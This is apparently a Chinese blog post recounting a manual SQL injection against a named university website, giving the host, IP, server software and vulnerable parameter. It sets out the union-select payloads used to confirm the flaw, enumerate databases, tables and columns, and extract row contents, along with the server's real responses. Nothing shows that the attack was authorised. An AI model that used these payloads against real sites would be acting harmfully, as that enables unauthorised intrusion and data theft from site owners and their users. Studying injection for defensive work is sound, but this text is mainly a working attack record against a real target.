记一次MySQL手工注入案例

记录一次手动注入学校某站MySQL的过程

信息收集

发现方式

子域名扫描 -> 导入awvs -> 批量扫blind-injection

url

http://home.bjtu.edu.cn/

info(whatweb)

  • 202.112.147.124(学校内网)
  • Apache/2.4.9
  • Win64
  • PHP/5.5.12

parameter

http://home.bjtu.edu.cn/ctrl/vote/ajax_vote_response.php?req=3&tid=1
- tid (GET)

测试

确认注入 =>tid

分号报错,有回显:
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6

判断版本 >4.0

and ord(mid(version(),1,1))>51
返回正常,说明版本>4.0,支持union

查字段数 =>5

order by+二分法

  • tid=1 and order by 6 => Unknown column ‘6’ in ‘order clause’
  • tid=1 and order by 5 => [{“item_title”:”3”,”item_id”:”3”,”item_count”:36},{“item_title”:”4”,”item_id”:”4”,”item_count”:22},{“item_title”:”5”,”item_id”:”5”,”item_count”:66},{“item_title”:”\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b92”,”item_id”:”2”,”item_count”:84},{“item_title”:”\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b9\u4e00”,”item_id”:”1”,”item_count”:103}]

union+select

tid=1 and 1=2 union select 1,2,3,4,5...,n
- 错误输出:
The used SELECT statements have a different number of columns
- 正确输出:
[{"item_title":"2","item_id":"1","item_count":4}]

信息收集

and 1=2 union select [function],-1,-1,-1,-1
- version() 查询数据库版本=>5.6.17
- database() 查询当前连接的数据库=>stu
- @@version_compile_os 查询当前操作系统=>Win64
- @@datadir 查询读取数据库路径=>c:\wamp\bin\mysql\mysql5.6.17\data\
- @@basedir 查询MYSQL安装路径

获取所有库名

in

select * from stu where tid=1 and 1=2 union select SCHEMA_NAME,-1,-1,-1,-1 from information_schema.columns;

或者:
select * from stu where tid=1 and 1=2 union select table_schema,-1,-1,-1,-1 from information_schema.columns;

out

[{"item_title":"-1","item_id":"information_schema","item_count":-1},
{"item_title":"-1","item_id":"mysql","item_count":-1},
{"item_title":"-1","item_id":"performance_schema","item_count":-1},
{"item_title":"-1","item_id":"stu","item_count":-1},
{"item_title":"-1","item_id":"student","item_count":-1}]

获取stu中的表名

in(含处理输出格式)

select * from stu where tid=1 and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-1,-1 from information_schema.columns where table_schema="stu";

out

[{"item_title":"-1","item_id":"[xxoo] fsa_about, fsa_contest_and_project, fsa_css3_example, fsa_nav_feedback, fsa_nav_feedback_type, fsa_nav_list, fsa_nav_page_list, fsa_nav_page_list_1, fsa_nav_page_list_395, fsa_nav_page_list_396, fsa_nav_page_list_398, fsa_nav_page_list_399, fsa_nav_page_list_400, fsa_nav_page_list_401, fsa_nav_page_list_402, fsa_nav_page_list_403, fsa_nav_page_list_404, fsa_nav_ ... [xxoo]","item_count":-1}]

获取fsa_vote_topic中的列名

in

and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT column_name),0x5B78786F6F5D),-1,-1,-1,-1 from information_schema.columns where table_name='fsa_vote_topic'

out

{"item_title":"-1","item_id":"[xxoo] topic_id, topic_title, topic_type_id [xxoo]","item_count":-1}]

确定字段数

in

and 1=2 union select concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic

out

[{"item_title":"-1","item_id":"[xxoo] 12 [xxoo]","item_count":-1}]

获取字段值

in

依次改变limit值可爆出多列内容

and 1=0 union select concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic LIMIT 0,1

out

[{"item_title":"-1","item_id":"[xxoo] \u5b66\u4e60\u8bdd\u98981 [xxoo]","item_count":-1}]

解码后为=> 学习话题1

注意

在写payload时,特别注意函数中的参数不用加引号,而使用等号赋值时需要加引号.

不加的情况(topic_title)(fsa_vote_topic):
concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D)
from fsa_vote_topic LIMIT 0,1

加的情况(有等号赋值时)
here table_name='fsa_vote_topic'

你可能感兴趣的:(mysql,域名)